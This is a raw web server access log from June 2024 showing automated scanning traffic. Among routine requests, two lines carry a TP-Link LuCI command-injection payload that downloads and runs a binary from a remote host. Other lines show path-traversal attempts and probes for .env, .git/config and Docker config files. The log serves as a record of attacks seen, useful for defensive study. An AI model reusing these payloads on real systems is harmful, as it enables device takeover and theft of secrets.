87.121.69.52 - - [03/Jun/2024:03:52:44 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
35.216.147.113 - - [03/Jun/2024:03:53:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
87.121.69.52 - - [03/Jun/2024:03:54:39 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
184.105.247.196 - - [03/Jun/2024:03:56:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.69.52 - - [03/Jun/2024:03:56:52 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
64.62.197.132 - - [03/Jun/2024:03:56:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.156.84 - - [03/Jun/2024:03:57:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
87.121.69.52 - - [03/Jun/2024:03:58:28 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
18.140.66.145 - - [03/Jun/2024:03:58:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Python-urllib/3.8"
18.140.66.145 - - [03/Jun/2024:03:59:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.7.62 Version/11.00"
18.140.66.145 - - [03/Jun/2024:03:59:25 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "Go-http-client/1.1"
64.62.156.67 - - [03/Jun/2024:03:59:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "HELP" 501 319 "-" "-"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "abuse.xmco.fr" 246.186.216.35.bc.googleusercontent.com - - [03/Jun/2024:04:02:28 +0200] "GET /server-status HTTP/1.1" 403 322 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.186.246 - - [03/Jun/2024:04:02:28 +0200] "GET /telescope/requests HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.186.246 - - [03/Jun/2024:04:02:29 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
35.216.186.246 - - [03/Jun/2024:04:02:29 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 abuse.xmco.fr"
141.98.11.79 - - [03/Jun/2024:04:02:47 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
5.189.156.66 - - [03/Jun/2024:04:07:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.69.52 - - [03/Jun/2024:04:12:32 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
198.235.24.46 - - [03/Jun/2024:04:13:33 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
195.154.87.70 - - [03/Jun/2024:04:14:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
87.121.69.52 - - [03/Jun/2024:04:19:21 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
205.210.31.185 - - [03/Jun/2024:04:19:27 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.121.69.52 - - [03/Jun/2024:04:20:00 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
87.121.69.52 - - [03/Jun/2024:04:22:09 +0200] "CONNECT google.com:443 HTTP/1.1" 405 340 "-" "Go-http-client/1.1"
199.188.204.17 - - [03/Jun/2024:04:24:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.189.156.66 - - [03/Jun/2024:04:28:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
199.188.204.17 - - [03/Jun/2024:04:33:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
2.189.133.92 - - [03/Jun/2024:04:36:51 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
5.189.156.66 - - [03/Jun/2024:04:54:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
205.210.31.90 - - [03/Jun/2024:04:57:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
205.210.31.90 - - [03/Jun/2024:04:57:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.142.182.121 - - [03/Jun/2024:05:01:48 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
5.189.156.66 - - [03/Jun/2024:05:01:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [03/Jun/2024:05:10:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
71.6.232.26 - - [03/Jun/2024:05:13:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
5.189.156.66 - - [03/Jun/2024:05:15:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [03/Jun/2024:05:19:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.189.156.66 - - [03/Jun/2024:05:29:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
198.199.101.115 - - [03/Jun/2024:05:30:07 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:30:15 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:30:38 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:31:09 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:31:27 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:31:49 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:31:56 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:32:20 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
198.199.101.115 - - [03/Jun/2024:05:32:23 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
185.180.143.11 - - [03/Jun/2024:05:32:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
198.199.101.115 - - [03/Jun/2024:05:33:09 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
185.180.143.11 - - [03/Jun/2024:05:33:09 +0200] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 335 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:25 +0200] "HEAD /icons/sphere1.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:26 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:26 +0200] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:26 +0200] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:26 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:27 +0200] "GET /zabbix/favicon.ico HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:39 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:56 +0200] "GET /admin/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:33:56 +0200] "GET /WebInterface/ HTTP/1.1" 404 318 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:34:11 +0200] "GET /identity HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:34:30 +0200] "GET /js/NewWindow_2_all.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:34:30 +0200] "GET /solr/ HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:34:51 +0200] "GET /static/historypage.js HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:06 +0200] "GET /api/session/properties HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:22 +0200] "GET /favicon-32x32.png HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:22 +0200] "GET /sugar_version.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:30 +0200] "GET /webfig/ HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:37 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:49 +0200] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 349 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:49 +0200] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:35:56 +0200] "GET /index.jsp HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
185.180.143.11 - - [03/Jun/2024:05:36:02 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
176.97.210.236 - - [03/Jun/2024:05:39:15 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F176.97.210.238%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
162.216.149.87 - - [03/Jun/2024:05:46:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
199.188.204.17 - - [03/Jun/2024:05:46:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.106.29.125 - - [03/Jun/2024:05:52:57 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
195.154.87.70 - - [03/Jun/2024:05:53:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.197.106 - - [03/Jun/2024:05:53:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
64.62.197.96 - - [03/Jun/2024:05:55:58 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0"
64.62.197.102 - - [03/Jun/2024:05:56:38 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
195.154.87.70 - - [03/Jun/2024:05:57:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.154.87.70 - - [03/Jun/2024:06:03:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.92.249.23 - - [03/Jun/2024:06:09:28 +0200] "HEAD / HTTP/1.0" 200 - "-" "-"
91.92.249.23 - - [03/Jun/2024:06:09:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go-http-client/1.1"
185.165.191.26 - - [03/Jun/2024:06:12:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
185.165.191.26 - - [03/Jun/2024:06:12:42 +0200] "GET /robots.txt HTTP/1.1" 404 315 "-" "-"
185.165.191.26 - - [03/Jun/2024:06:12:42 +0200] "GET /sitemap.xml HTTP/1.1" 404 316 "-" "-"
185.165.191.26 - - [03/Jun/2024:06:12:43 +0200] "GET /.well-known/security.txt HTTP/1.1" 404 329 "-" "-"
185.165.191.26 - - [03/Jun/2024:06:12:44 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /phpinfo.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /phpinfo HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /php.ini HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:34 +0200] "GET /php.php HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /infophp.php HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /test.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /dashboard/phpinfo.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /php-info.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /linusadmin-phpinfo.php HTTP/1.1" 404 327 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:35 +0200] "GET /infos.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /old_phpinfo.php HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /temp.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /time.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /phpversion.php HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /pinfo.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:36 +0200] "GET /i.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /asdf.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /config.json HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /config/config.json HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /info.json HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /.config/gatsby/config.json HTTP/1.1" 404 331 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:37 +0200] "GET /.cordova/config.json HTTP/1.1" 404 325 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /.deployment-config.json HTTP/1.1" 404 328 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /.docker/config.json HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /.docker/daemon.json HTTP/1.1" 404 324 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /.jupyter/jupyter_notebook_config.json HTTP/1.1" 404 342 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
51.222.82.223 - - [03/Jun/2024:06:15:38 +0200] "GET /.lanproxy/config.json HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
